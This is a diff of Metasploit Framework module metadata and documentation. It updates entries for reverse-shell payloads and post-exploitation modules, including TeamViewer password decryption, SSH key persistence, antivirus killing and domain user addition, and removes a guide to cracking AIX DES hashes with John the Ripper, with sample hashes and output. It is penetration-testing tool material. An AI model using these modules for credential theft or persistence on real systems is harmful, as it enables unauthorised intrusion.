    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -147554,7 +148779,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -147589,7 +148814,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -147831,7 +149056,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -147866,7 +149091,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -147901,7 +149126,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-24 05:40:02 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -148074,7 +149299,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -148109,7 +149334,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -148144,7 +149369,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -148377,7 +149602,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -148412,7 +149637,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -148447,7 +149672,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -148482,7 +149707,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -148517,7 +149742,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -148552,7 +149777,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -148689,7 +149914,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -148724,7 +149949,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -148759,7 +149984,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -149576,7 +150801,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -149611,7 +150836,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -149646,7 +150871,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -150357,7 +151582,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -150392,7 +151617,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -150427,7 +151652,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -151267,7 +152492,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-31 09:32:44 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -151302,7 +152527,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-31 09:32:44 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -151337,7 +152562,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-31 09:32:44 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -152922,7 +154147,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
    "references": [
@@ -152934,7 +154159,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb",
    "is_install_path": true,
    "ref_name": "python/shell_reverse_tcp_ssl",
@@ -152988,7 +154213,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Continually listen for a connection and spawn a command shell via R",
    "references": [
@@ -153000,7 +154225,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/r/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "r/shell_bind_tcp",
@@ -153021,7 +154246,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via R",
    "references": [
@@ -153033,7 +154258,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "r/shell_reverse_tcp",
@@ -153222,7 +154447,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via Ruby, uses SSL",
    "references": [
@@ -153234,7 +154459,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb",
    "is_install_path": true,
    "ref_name": "ruby/shell_reverse_tcp_ssl",
@@ -154539,7 +155764,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-25 16:49:59 +0000",
    "path": "/modules/payloads/singles/windows/messagebox.rb",
    "is_install_path": true,
    "ref_name": "windows/messagebox",
@@ -157270,7 +158495,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-02 15:47:36 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/payloads/singles/windows/pingback_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/pingback_reverse_tcp",
@@ -163123,7 +164348,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-15 14:35:38 +0000",
    "path": "/modules/post/linux/gather/enum_system.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_system",
@@ -166201,7 +167426,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-04-24 05:06:20 +0000",
+    "mod_time": "2020-02-13 16:17:33 +0000",
    "path": "/modules/post/osx/gather/password_prompt_spoof.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/password_prompt_spoof",
@@ -168389,6 +169614,40 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/teamviewer_passwords": {
+    "name": "Windows Gather TeamViewer Passwords",
+    "fullname": "post/windows/gather/credentials/teamviewer_passwords",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Nic Losby <blurbdust@gmail.com>"
+    ],
+    "description": "This module will find and decrypt stored TeamViewer passwords",
+    "references": [
+      "CVE-2019-18988",
+      "URL-https://whynotsecurity.com/blog/teamviewer/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-07 10:07:41 +0000",
+    "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/teamviewer_passwords",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/tortoisesvn": {
    "name": "Windows Gather TortoiseSVN Saved Password Extraction",
    "fullname": "post/windows/gather/credentials/tortoisesvn",
@@ -169249,7 +170508,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-03-24 16:02:54 +0000",
    "path": "/modules/post/windows/gather/enum_domain.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain",
@@ -169306,7 +170565,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate tokens present on a system that are part of the\n            domain the target host is part of, will also enumerate users in the local\n            Administrators, Users and Backup Operator groups to identify Domain members.\n            Processes will be also enumerated and checked if they are running under a\n            Domain account, on all checks the accounts, processes and tokens will be\n            checked if they are part of the Domain Admin group of the domain the machine\n            is a member of.",
+    "description": "This module will enumerate tokens present on a system that are part of the\n        domain the target host is part of, will also enumerate users in the local\n        Administrators, Users and Backup Operator groups to identify Domain members.\n        Processes will be also enumerated and checked if they are running under a\n        Domain account, on all checks the accounts, processes and tokens will be\n        checked if they are part of the Domain Admin group of the domain the machine\n        is a member of.",
    "references": [

    ],
@@ -169316,7 +170575,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-03-24 16:02:54 +0000",
    "path": "/modules/post/windows/gather/enum_domain_tokens.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain_tokens",
@@ -169639,7 +170898,7 @@
      "zeroSteiner <zeroSteiner@gmail.com>",
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering",
+    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
    ],
@@ -169649,7 +170908,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-12-14 15:58:45 +0000",
+    "mod_time": "2020-01-14 20:49:39 +0000",
    "path": "/modules/post/windows/gather/enum_patches.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_patches",
@@ -170944,7 +172203,7 @@
    ],
    "description": "This module modifies a remote .docx file that will, upon opening, submit\n        stored netNTLM credentials to a remote host. Verified to work with Microsoft\n        Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n        auxiliary/server/capture/smb module can be used.",
    "references": [
-      "URL-http://jedicorp.com/?p=534"
+      "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534"
    ],
    "platform": "Windows",
    "arch": "",
@@ -170952,7 +172211,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-24 18:17:06 +0000",
    "path": "/modules/post/windows/gather/word_unc_injector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/word_unc_injector",
@@ -170963,11 +172222,11 @@
    },
    "needs_cleanup": null
  },
-  "post_windows/manage/add_user_domain": {
+  "post_windows/manage/add_user": {
    "name": "Windows Manage Add User to the Domain and/or to a Domain Group",
-    "fullname": "post/windows/manage/add_user_domain",
+    "fullname": "post/windows/manage/add_user",
    "aliases": [
-
+      "post/windows/manage/add_user_domain"
    ],
    "rank": 300,
    "disclosure_date": null,
@@ -170975,7 +172234,7 @@
    "author": [
      "Joshua Abraham <jabra@rapid7.com>"
    ],
-    "description": "This module adds a user to the Domain and/or to a Domain group. It will\n            check if sufficient privileges are present for certain actions and run\n            getprivs for system.  If you elevated privs to system, the\n            SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n            a process that is running as system. If you don't have privs, this script\n            exits.",
+    "description": "This module adds a user to the Domain and/or to a Domain group. It will\n        check if sufficient privileges are present for certain actions and run\n        getprivs for system.  If you elevated privs to system, the\n        SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n        a process that is running as system. If you don't have privs, this script\n        exits.",
    "references": [

    ],
@@ -170985,10 +172244,10 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-17 16:00:04 +0000",
-    "path": "/modules/post/windows/manage/add_user_domain.rb",
+    "mod_time": "2020-03-24 16:02:54 +0000",
+    "path": "/modules/post/windows/manage/add_user.rb",
    "is_install_path": true,
-    "ref_name": "windows/manage/add_user_domain",
+    "ref_name": "windows/manage/add_user",
    "check": false,
    "post_auth": true,
    "default_credential": false,
@@ -171138,7 +172397,7 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module will download a file by importing urlmon via railgun.\n        The user may also choose to execute the file with arguments via exec_string.",
    "references": [
@@ -171150,7 +172409,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/post/windows/manage/download_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/download_exec",
@@ -171216,7 +172475,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-21 22:46:30 +0000",
+    "mod_time": "2020-03-20 14:12:01 +0000",
    "path": "/modules/post/windows/manage/enable_rdp.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/enable_rdp",
@@ -171271,7 +172530,7 @@
    "type": "post",
    "author": [
      "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module will execute a powershell script in a meterpreter session.\n        The user may also enter text substitutions to be made in memory before execution.\n        Setting VERBOSE to true will output both the script prior to execution and the results.",
    "references": [
@@ -171283,7 +172542,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/post/windows/manage/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/exec_powershell",
@@ -171461,6 +172720,74 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/install_python": {
+    "name": "Install Python for Windows",
+    "fullname": "post/windows/manage/install_python",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module places an embeddable Python3 distribution onto the target file system,\n                        granting pentesters access to a lightweight Python interpreter.\n                        This module does not require administrative privileges or user interaction with\n                        installation prompts.",
+    "references": [
+      "URL-https://docs.python.org/3/using/windows.html#windows-embeddable",
+      "URL-https://attack.mitre.org/techniques/T1064/"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-03-25 07:30:05 +0000",
+    "path": "/modules/post/windows/manage/install_python.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/install_python",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "post_windows/manage/install_ssh": {
+    "name": "Install OpenSSH for Windows",
+    "fullname": "post/windows/manage/install_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
+    "references": [
+      "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview",
+      "URL-https://github.com/PowerShell/openssh-portable"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-01-19 19:51:44 +0000",
+    "path": "/modules/post/windows/manage/install_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/install_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/killav": {
    "name": "Windows Post Kill Antivirus and Hips",
    "fullname": "post/windows/manage/killav",
@@ -171520,7 +172847,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-12-17 16:39:18 +0000",
+    "mod_time": "2020-03-10 13:00:12 +0000",
    "path": "/modules/post/windows/manage/migrate.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/migrate",
@@ -171774,7 +173101,7 @@
    "type": "post",
    "author": [
      "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module will download and execute a PowerShell script over a meterpreter session.\n        The user may also enter text substitutions to be made in memory before execution.\n        Setting VERBOSE to true will output both the script prior to execution and the results.",
    "references": [
@@ -171786,7 +173113,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/exec_powershell",
@@ -171941,9 +173268,10 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
+      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
+      "b4rtik"
    ],
-    "description": "This module will inject into the memory of a process a specified Reflective DLL.",
+    "description": "This module will inject a specified reflective DLL into the memory of a\n        process, new or existing. If arguments are specified, they are passed to\n        the DllMain entry point as the lpvReserved (3rd) parameter. To read\n        output from the injected process, set PID to zero and WAIT to non-zero.\n        Make sure the architecture of the DLL matches the target process.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection"
    ],
@@ -171953,7 +173281,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-26 11:31:34 +0000",
    "path": "/modules/post/windows/manage/reflective_dll_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/reflective_dll_inject",
@@ -172262,6 +173590,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/sshkey_persistence": {
+    "name": "SSH Key Persistence",
+    "fullname": "post/windows/manage/sshkey_persistence",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Dean Welch <dean_welch@rapid7.com>"
+    ],
+    "description": "This module will add an SSH key to a specified user (or all), to allow\n          remote login via SSH at any time.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-03-05 14:48:37 +0000",
+    "path": "/modules/post/windows/manage/sshkey_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/sshkey_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/sticky_keys": {
    "name": "Sticky Keys Persistance Module",
    "fullname": "post/windows/manage/sticky_keys",
@@ -9,8 +9,6 @@

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Install the application
  2. Start msfconsole
  3. Do: ```use auxiliary/admin/smb/webexec_command```
@@ -22,7 +20,7 @@

 ## Options

-  **FORCE_GUI**
+### FORCE_GUI

  Uses WMIC to create a GUI

@@ -1,141 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
-  based password hashes, such as:
-
-  * `DES` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with a `des` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_aix```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
-```
-
-Crack them:
-
-```
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
-Session completed
-[*] Cracking descrypt hashes in single mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
